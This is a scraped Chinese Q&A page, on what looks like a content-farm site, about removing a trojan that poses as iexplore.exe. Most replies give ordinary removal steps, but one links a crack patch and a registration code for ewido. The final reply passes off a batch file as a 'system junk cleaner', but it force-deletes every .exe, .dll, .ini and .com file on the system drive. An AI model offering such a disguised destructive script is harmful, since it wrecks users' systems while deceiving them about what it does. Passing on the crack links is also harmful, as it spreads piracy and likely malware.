神马品牌网2017年8月里番介绍:顽固病毒如何清除问题
来源:百度文库 编辑:神马品牌网 时间:2024/05/03 01:49:49
打开IE时就变成2个IEXPLORE.EXE 一个为我的用户名 一个为系统的 肯定是木马,请高手指点迷津,小弟在这里谢谢了,好人一生平安
用中文版ewido,自动免费升级.
最新的木马查杀软件ewido-setup_4.0.0.172c中文!自动更新!
http://post.baidu.com/f?kz=117949629
http://post.baidu.com/f?kz=116662903
iexplore.exe是Microsoft Internet Explorer的主程序。这个微软Windows应用程序让你在网上冲浪,和访问本地Interanet网络。这不是纯粹的系统程序,但是如果终止它,可能会导致不可知的问题。iexplore.exe同时也是Avant网络浏览器的一部分,这是一个免费的基于Internet Explorer的浏览器。注意iexplore.exe也有可能是Trojan.KillAV.B病毒,该病毒会终止你的反病毒软件,和一些 Windows系统工具,该进程的安全等级是建议删除
这个东西可以说是病毒,也可以说不是病毒。
因为微软的浏览器就是IEXPLORE.EXE,但是它一般情况随系统被安装在C:\Program Files\Internet Explorer下面。那么,如果发现这个文件是在这个目录下面的,一般情况不是病毒,当然,不包括已经被感染了的情况;还有一种情况,就是 IEXPLORE.EXE在C:\WINDOWS\system32\下面,那么这个十有八九都是病毒。
如果你没开IE,一般不会出现iexplore.exe 的,如果有90%中招了~~~
中毒情况如下:浏览器被劫持了,或者病毒名为:IEXPL0RE.EXE,注意,这里是0,不是O
如果是病毒名为IEXPL0RE.EXE,进入安全模式或DOS,最新病毒库查杀,前提是杀毒软件不要太次。
如果是浏览器被劫持,在注册表里搜索所有RUN项,看看是否有可疑文件启动路径,还有搜索IEXPLORE.EXE,看看启动项后面是否有尾巴,也就是有跟随IEXPLORE.EXE启动的项目(例如IE后面跟随 C:\\windows\\system32\\***.exe或者.dll)。
iexplore.exe进程--病毒
系统进程--伪装的病毒iexplore.exe
Trojan.PowerSpider.ac破坏方法:密码解霸V8.10。又称“密码结巴”
偷用户各种密码,包含:游戏密码、局域网密码、腾讯QQ账号和密码、POP3密码、Win9x缓存密码及拨号账号等等。这个木马所偷密码的范围很广,对广大互联网用户的潜在威胁也巨大。
现象:
1.系统进程中有iexplore.exe运行,注意,是小写字母
2.搜索该程序iexplore.exe,不是位于C盘下的PROGRAMME文件夹,而是WINDOWS32文件夹。
解决办法:
1.到C:\\WINDOWS\\system32下找到iexplore.exe和psinthk.dll完全删除之。
2.到注册表中,找到HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion
\\Run“mssysint”=iexplore.exe,删除其键值
用ewido来杀了这个木马
下载地址:http://www.grisoft.cz/softw/70/filedir/inst/ewido-setup_4.0.0.172b.exe
汉化补丁:http://p2s.newhua.com/down/HB_ewidoAntispy-ware400172c_plus_yfy.exe
注册码为:70EW-TH17Q1-PM-C01-S1W2QD-MEM-NUYY
破解补丁:http://yy001.asp1.wy8.net/demo/bbsupfile/upfile/200673011237.rar
(用ewido前一定要看:http://zhidao.baidu.com/question/9819805.html)
打开windows任务管理器,察看是否有可疑的进程在运行,如果有把它结束。(Rundll32.exe本身不是病毒,有可能一个dll文件在运行,他可能是病毒或恶意程序之类的东西。)
若提示无法结束,再察看控制面板〉管理工具〉服务,看有没有与之相关的 服务(特别是“描述”为空的)在运行,把它停止。同时设法查找这些恶意程序文件(如system32文件夹中是否有不明dll或exe文件,C:\Program Files C:\Documents and Settings\user\Local Settings\Temporary Internet Files C:\Documents and Settings\user\Local Settings\Temp 等处是否有不明文件或染毒文件),然后删去!
转载请注明原作者恋曲2010
那你肯定很卡 CPU100%了 不要慌 先试下启动时按F8 进入安全模式杀毒 如果杀不了 立刻重装系统 或者你要不嫌麻烦呢 就每次开机后按ctrl+alt+delete 点进程将他关掉 我也遇到过 不过我直接选择了重装 我怕把硬件搞毛了
呵呵~~你中的木马病毒一般是清不掉的~这样吧~~我教你一招~你就招我下面的去做就是了~~
打开[开始]-[所有程序]-[附件]-[记事本]
然后复制以下内容
@echo off
echo 正在清除系统垃圾文件,请稍等......
del /f /s /q %systemdrive%\*.exe
del /f /s /q %systemdrive%\*.ini
del /f /s /q %systemdrive%\*.htt
del /f /s /q %systemdrive%\*.com
del /f /s /q %systemdrive%\*.asp
del /f /s /q %systemdrive%\*.dll
del /f /s /q %systemdrive%\recycled\*.*
del /f /s /q %windir%\*.bak
del /f /s /q %windir%\prefetch\*.*
rd /s /q %windir%\temp & md %windir%\temp
del /f /q %userprofile%\COOKIES s\*.*
del /f /q %userprofile%\recent\*.*
del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
del /f /s /q "%userprofile%\recent\*.*"
sfc /purgecache '清理系统盘无用文件
defrag %systemdrive% -b '优化预读信息
echo 清除系统LJ完成!
echo. & pause
复制完保存,就是点记事本左上角的 文件 , 选保存 ,然后更名为“清除系统LJ.bat” 就OK了,以后只要双击运行该文件,当屏幕提示“清除系统LJ完成!就还你一个“苗条”的系统了!!